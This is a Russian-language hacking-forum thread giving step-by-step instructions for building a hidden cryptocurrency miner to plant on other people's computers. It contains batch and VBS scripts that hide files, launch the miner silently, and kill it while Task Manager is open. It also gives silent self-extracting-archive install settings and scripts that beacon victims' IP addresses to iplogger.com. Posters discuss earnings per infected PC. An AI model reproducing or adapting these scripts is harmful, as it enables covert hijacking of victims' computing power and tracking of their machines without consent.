Делаем скрытый майнер (скрытие из диспетчера, ip logger)

Тема в разделе "Майнеры", создана пользователем Resolution, 23.07.2017.

  1. Resolution
    Resolution

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    27.05.2017
    Сообщения:
    49
    Репутация:
    +18 / -0
    Скрытый майнер из подручной хуйни и батиных трав

    Первое что нам нужно - исходники. Качаем архив и находим следующие файлы:

    libcrypto-1.0.0.dll
    libcurl-4.dll
    libgcc_s_seh-1.dll
    libjansson-4.dll
    libssl-1.0.0.dll
    libstdc++-6.dll
    libwinpthread-1.dll
    libz-1.dll
    cpuminer-SSE2.exe (переименуем на cpuminer.exe)


    Скачать: Что бы посмотреть ссылку войдите или зарегистрируйтесь

    Создаем новую папку и кидаем туда эти файлы

    Далее создаем батник для скрытия файлов и запуска майнера (cpu.bat):

    Код:
    attrib +h +r +s /S /D *.*
    set /a cpu=%NUMBER_OF_PROCESSORS%/2
    cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u %Ваша почта% -p x -t %cpu%
    set /a cpu=%NUMBER_OF_PROCESSORS%/2 - работа на половине cpu
    set /a cpu=%NUMBER_OF_PROCESSORS%-1 - работа на всех cpu за исключением одного

    Скрипт на
    vbs для скрытого запуска батника (cpu.vbs):
    Код:
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run chr(34) & C:\ProgramData\Windows\cpu.bat" & Chr(34), 0
    Set WshShell = Nothing
    Теперь - батник для сокрытия cpuminer.exe из
    Диспетчера (поддерживаются Win 8 и старше), ProcessHacker, ProcessExplorer (Explorer.bat):



    Создадим vbs для скрытого запуска Explorer.bat (Explorer.vbs):
    Код:
    [CODE]Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run chr(34) & "C:\ProgramData\Windows\Explorer.bat" & Chr(34), 0
    Set WshShell = Nothing
    И так, у нас есть:

    cpu.bat - запуск майнера
    cpu.vbs - скрытый запуск cpu.bat
    Explorer.bat - сокрытие из диспетчера
    Explorer.vbs - скрытый запуск Explorer.bat
    libcrypto-1.0.0.dll

    libcurl-4.dll
    libgcc_s_seh-1.dll
    libjansson-4.dll
    libssl-1.0.0.dll
    libstdc++-6.dll
    libwinpthread-1.dll
    libz-1.dll
    cpuminer.exe

    Выделяем файл и клацаем
    создать архив.
    В параметрах архива ставим галку
    SFX архив, метод сжатия - максимальный.
    Можно добавить иконку. Идем в
    параметры SFX => Текст и графика => Загрузить значёк SFX из файла. Выбираем иконку с расширением .ico.
    Переходим во вкладку комментарий. Вставляем это:
    Код:
    Path=C:\ProgramData\Windows
    Setup=Explorer.vbs
    Silent=1
    Overwrite=1
    Update=U
    Shortcut=T, "Explorer.vbs", , , Explorer.lnk, 
    И создаем архив. В принципе все.

    Еще пара скриптов от меня (
    vbs)

    Ошибка:


    Ip logger:
     
    Последнее редактирование: 23.07.2017
    • Нравится Нравится x 10
  2. raul
    raul

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    25.10.2016
    Сообщения:
    97
    Репутация:
    +25 / -0
    нормуль. только если на пк будут avx инструкции не заработает же:Boast
     
  3. Resolution
    Resolution

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    27.05.2017
    Сообщения:
    49
    Репутация:
    +18 / -0
    Можешь свой поставить
     
  4. Retro000
    Retro000

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    06.09.2017
    Сообщения:
    1
    Репутация:
    +0 / -0
    Мб лучше собрать его через SIM ?
     
  5. Vlean
    Vlean

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Онлайн
    Регистрация:
    02.01.2017
    Сообщения:
    257
    Репутация:
    +81 / -0
    Много ли всё это приносит
     
  6. Resolution
    Resolution

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    27.05.2017
    Сообщения:
    49
    Репутация:
    +18 / -0
    Ды как хош
    От количества пк зависит
    С 15 компов где то по 1$ в сутки
    Норвегам с нулевой репой личный не даю!
     
  7. SnIpErFaN
    SnIpErFaN

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    25.08.2016
    Сообщения:
    113
    Репутация:
    +58 / -1
    Ты не объяснил что нужно прописать в данной вкладке : Winrar(создание архива) => Установка => Параметры установки => Выполнить до и после распаковки.

    И ещё , как склеить ещё этих 2 скрипта в уже созданный выше майнер
     
  8. Resolution
    Resolution

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    27.05.2017
    Сообщения:
    49
    Репутация:
    +18 / -0
    Защита от дурака
     
  9. 101nts
    101nts

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    30.08.2017
    Сообщения:
    1
    Репутация:
    +0 / -0
    Скрипт для Ip logger если надо кому.
    Код:
    GetUrlData "https://iplogger.com/ваш id"
    
    Function GetUrlData(sUrl)
        Dim oHttp
        Set oHttp = CreateObject("MSXML2.ServerXMLHTTP")
        oHttp.setTimeouts 0, 0, 0, 0
      
        oHttp.Open "GET", sUrl, False
        oHttp.send
        GetUrlData = oHttp.responseText
        Set oHttp = Nothing
    End Function
     
    Последнее редактирование: 12.10.2017
  10. Ç▲╟l╟l▲ᗾ|Š
    Ç▲╟l╟l▲ᗾ|Š

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    25.06.2017
    Сообщения:
    56
    Репутация:
    +17 / -0
    Всё чётко, лайк.
    Только вот ошибка в коде cpu.vbs, кавычку пропустил:
    Код:
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run chr(34) & "C:\ProgramData\Windows\cpu.bat" & Chr(34), 0
    Set WshShell = Nothing
    Хотя там кавычки по сути и не нужны.
    Завтра проверю на дедиках.
     
  11. n3und3r
    n3und3r

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    26.07.2016
    Сообщения:
    178
    Репутация:
    +41 / -15
    в чем проблема?
     

    Вложения:

  12. SnIpErFaN
    SnIpErFaN

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    25.08.2016
    Сообщения:
    113
    Репутация:
    +58 / -1
    Код эксплорер.вбс покажи
     
  13. n3und3r
    n3und3r

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    26.07.2016
    Сообщения:
    178
    Репутация:
    +41 / -15
    всё написано так как в мануале
    хз в чем проблема

    я уже не интересуюсь именно этим способом)
     
  14. finkOS
    finkOS

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    20.12.2016
    Сообщения:
    44
    Репутация:
    +5 / -0
    Дайте плз личный со всем скрытым контентом, буду очень благодарен.
     
  15. kalijack
    kalijack

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    10.12.2017
    Сообщения:
    9
    Репутация:
    +0 / -0
    Дружище если скинули, перешли плиз, буду премного благодарен
     
  16. finkOS
    finkOS

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    20.12.2016
    Сообщения:
    44
    Репутация:
    +5 / -0
    Еще не скидывали.
     
  17. N_E_X_T
    N_E_X_T

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Онлайн
    Регистрация:
    24.11.2017
    Сообщения:
    34
    Репутация:
    +4 / -0
    TIMEOUT /T 5
    set process1=taskmgr.exe
    set process2=5.exe //название вашего процесс.. майнера
    set start=C:\5\start.bat //конфиг запуска.

    tasklist /FI "ImageName EQ %process2%" | find /I "%process2%"
    If %errorlevel% NEQ 1 goto :ex
    :one
    TIMEOUT /T 2
    tasklist /FI "ImageName EQ %process1%" | find /I "%process1%"
    If %errorlevel% NEQ 0 goto :one
    taskkill /f /im %process2%
    :one
    tasklist /FI "ImageName EQ %process2%" | find /I "%process2%"
    If %errorlevel% NEQ 1 goto :one

    :go
    TIMEOUT /T 3
    tasklist /FI "ImageName EQ %process1%" | find /I "%process1%"
    If %errorlevel% NEQ 1 goto :go
    start %start%
    goto :one
    :ex
    exit

    Вот вам батник, который скрывает ваш майнер при открытии диспетчера задач и снова запускает при закрытии...
    ----------------------------------------------------------------------
    Вот vbs на отстук на иплоггер

    On Error Resume Next
    Set m = CreateObject("WinHttp.WinHttpRequest.5.1")
    m.Open "GET", "Что бы посмотреть ссылку войдите или зарегистрируйтесь",0
    m.send
    -----------------------------------------------------------------------
    Что вам еще бросить?:Biggrin
     
  18. finkOS
    finkOS

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    20.12.2016
    Сообщения:
    44
    Репутация:
    +5 / -0
    Этого достаточно, с остальным должен сам разобраться, наверное :) Очень благодарен.
     
  19. N_E_X_T
    N_E_X_T

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Онлайн
    Регистрация:
    24.11.2017
    Сообщения:
    34
    Репутация:
    +4 / -0
    Всегда пожалуйста! И да...всего-то нужно скачать было несколько паблик майнеров и их разобрать и там нашли б эти коды.:Mail1
     
  20. kalijack
    kalijack

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    10.12.2017
    Сообщения:
    9
    Репутация:
    +0 / -0
    Пасиб :Wink